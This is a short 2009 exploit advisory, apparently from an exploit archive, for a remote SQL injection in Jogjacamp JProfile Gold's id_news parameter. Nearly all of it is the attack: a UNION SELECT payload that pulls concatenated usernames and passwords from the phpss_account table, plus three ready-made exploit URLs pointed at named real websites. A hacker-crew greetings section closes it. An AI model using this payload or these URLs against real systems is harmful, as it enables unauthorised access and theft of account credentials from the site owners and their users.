[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
# Published : 2009-03-03
# Author : kecemplungkalen
# Previous Title : NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
# Next Title : Dogfood CRM 2.0.10 spell.php Command Injection
###############################################################
__
|__|__ ________ ____ ___________ ______ _ __
| | | ____ _/ __ _/ ____ __ _/ __ / / /
| | | / |_> > ___/ ___| | / ___/ /
/__| |____/| __/ ___ > ___ >__| ___ >/_/
______| |__| / / /
###############################################################
Jogjacamp JProfile Gold SQL Injection
by kecemplungkalen
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
###############################################################
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# www.Syue.com [2009-03-03]